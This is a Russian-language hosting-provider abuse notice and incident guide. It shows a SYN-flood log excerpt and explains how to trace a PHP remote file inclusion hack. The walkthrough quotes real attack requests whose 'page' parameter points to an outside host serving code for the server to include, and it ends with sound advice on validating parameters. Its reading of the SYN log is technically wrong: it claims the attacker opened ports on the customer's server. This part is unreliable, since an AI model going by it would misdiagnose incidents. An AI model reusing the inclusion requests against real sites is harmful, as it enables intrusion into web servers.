Attack detail : 15Kpps/110Mbps
dateTime srcIp:srcPort dstIp:dstPort protocol flags bytes reason
2016.07.07 18:55:06 CEST 0.0.0.0:43086 1.1.1.1:80 TCP SYN 902 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:58118 11.1.1.1:80 TCP SYN 929 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:32830 1.1.1.1:80 TCP SYN 920 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:50782 1.1.1.1:80 TCP SYN 920 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:48237 1.1.1.1:80 TCP SYN 920 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 50.0.0.0:9736 1.1.1.1:80 TCP SYN 930 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:26701 1.1.1.1:80 TCP SYN 936 ATTACK:TCP_SYN
Эти системные данные поступили к Вам как доказательство произведенного вторжения в компьютерную систему.
dateTime - центральноевропейское летнее время
srcIp:srcPort - локальный адрес "0.0.0.0:43086" означает, что взломщик открыл порты "43086, 58118 .... 26701" на Вашем сервере.
dstIp:dstPort - удаленный адрес "1.1.1.1:80" означает, что этот порт признает соединения всех устройств с любого порта.
protocol flags - означает, что протокол соединения "TCP SYN" в настоящий момент открыт и используется злоумышленниками.
Таким образом, мы можем выяснить, что программа была запущена с Вашей сервера. Наименование программы в этой связи скорее не так важно, так как взломщики часто используют выдуманные и неправильные названия программ, чтобы запутать администраторов.
Все нарушение которые BITWEB отправляет своим клиентам отслеживаются и регистрируются в bitweb.center, при достижение определенного лимита по количеству отправленных уведомлений, о противоправных действиях в лице нарушителя или пострадавшего, услуги клиента навсегда блокируются.
- Если Вы используете распространенную систему как, например, Wordpress, Joomla, phpBB, phpnuke...: для этих популярных систем разработчики регулярно предоставляют обновления, которые устраняют «дыры» в системе защиты, о которых сообщили пользователи. Обновите свою систему, и в дальнейшем получайте информацию о новых обновлениях, например, путем регистрации в списке сообщений официальной страницы программы. Если Вы уже используете последнюю версию программного обеспечения, то незамедлительно сообщите на официальном форуме программы о проблеме, так как в этом случае разработчики смогут быстро разработать и предоставить программу-корректор для «дыры» в системе защиты, которую Вы сможете потом установить.
- Если Вы используете найденные в сети или собственные скрипты: Самое простое решение: Вы можете воспользоваться нашей аутсорсинг-услугой, связавшись со службой поддержки BITWEB, которая составит для Вас предварительную смету расходов для поиска «дыры» в системе защиты. Во время атаки наши техники смогут: - обнаружить скрипт, содержащий ошибку - найти всевозможную информацию о происхождении атаки - найти «дыру» в системе защиты в скрипте с ошибкой - сделать заключение об использованном способе воздействия и методе, с помощью которого была найдена «дыра» в скрипте - предложить Вам некоторые меры по защите и коррекции для обеспечения лучшей защиты в будущем.
- Если Вы хотите осуществить поиск самостоятельно: разработать детальную процедуру, с помощью которой Вы с уверенностью сможете определить причину взлома, невозможно. Но, в целом, таким образом поступают, если взломщик использовал «дыру» в скрипте и применил запрос HTTP. Все запросы HTTP доступны в Ваших журналах регистрации.
1 Запомните дату и время получения оповещения
2 Просмотрите свои журналы регистрации, начиная с данного времени и постепенно расширьте время поиска в обратном направлении, пока не найдете неправильное (странное, отличное от других…) сообщение. Это может потребовать определенных навыков и опыта работы с форматами запросов.
3 Отметьте скрипт, упомянутый в запросе
4 Изучите скрипт, чтобы найти «дыру» в системе защиты.
5 Исправьте ошибку.
Мы покажем Вам процесс аутсорсинга защиты от атаки на одного из наших клиентов виртуального сервер. Таким образом, Вы сможете понять, что мы предпринимаем при нападении и какой способ действий Вам следует использовать, если Вы осуществляете поиск самостоятельно. Здесь речь идет о классической include-дыре, которую можно легко обнаружить.
1 Мы просматриваем журналы соединений. Если посмотреть в журналах регистрации по указанным датам, то можно найти в обоих случаях подозрительную запись:
65.39.172.139 www.*********.net - 23/Oct/2016:10:57:19 +0200 "GET /XII_IWB/index.php?page=http://65.39.172.139:113/2 HTTP/1.1" 200 1793 "-" "curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled)"
65.39.172.139 www.*********.net - 27/Oct/2016:20:52:33 +0200 "GET /XII_IWB/index.php?page=http://65.39.172.139:113/3 HTTP/1.1" 200 1793 "-" "curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled)
Эти записи подозрительные, так как замечено, что параметр page в URL – внешний адрес и использует нестандартный порт (стандартный порт для HTTP 80, а здесь происходит атака на порт 113):
index.php?page=https://65.39.172.139:113/4
2 Идем по следу взломщика; это может быть необходимо составления для жалобы или для того, чтобы связаться с хостером взломщика, чтобы он удалил его:
65.39.172.139 Вероятно, IP-адрес взломщика. К этому адресу не подключен обратный адрес (название устройства), но SOA показывает: 172.39.65.in-addr.arpa. 10800 IN SOA ns1.peer1.net
Administrative Contact:
Administrator, Domain domains@peer1.net
1600-555 West Hastings Street
Vancouver, BC V6B 4N5
CA
(604) 683-7747
Целесообразно будет связаться с этой фирмой и проинформировать о происшествии, назвав время атаки и соответствующий IP-адрес.
3 Рассмотрим учетную запись и более подробно проблемный скрипт, чтобы найти «дыру» в системе защиты и, возможно, еще какие-то подозрительные факты: Сразу же можно заметить, что в корне папки XII_IWB находятся три «комических» папки:
drwxr-xr-x 13 ******** users 4096 jun 17 13:54
drwxr-xr-x 13 ******** users 4096 jun 17 13:54
drwxr-xr-x 13 ******** users 4096 jun 17 13:55
Эти три папки носят имена, которые состоят из знаков пробелов. Речь может идти о папках, которые оставил взломщик. Вы хотите их удалить?
После этого рассмотрим файл index.php:
На самом деле он содержит параметр $page, который вслед за этим вставляется в скрипт командой включения (). Контроль этого параметра очень недостаточен, так как он подхватывается командой включения и таким образом может исполнить вредоносный код.
4 Указания закрыть дыру и усилить меры безопасности: Самая первая мера может заключаться в блокировке IP-адреса взломщика, так как он всегда использует одинаковый адрес; но это не решает проблему в полной мере, так как другой взломщик (с другим IP-адресом) может использовать эту самую «дыру» с системе безопасности.
В дальнейшем необходимо закрыть «дыру» include. Для этого достаточно будет контролировать формат параметра page, введенного в URL. Если этот параметр имеет определенный формат (например, состоит только из букв), для проверки формата Вы можете использовать регулярное выражение.
Если используются различные форматы, то Вы можете, по крайней мере, запретить использование служебных знаков, например, / или строк, например, http://. Это очень сильно ограничивает возможности обхода. Незамедлительно перепроверьте таким же образом все свои скрипты на наличие «дыр» в системе безопасности и проведите общую проверку всех введенных пользователями или переданных по URL параметров.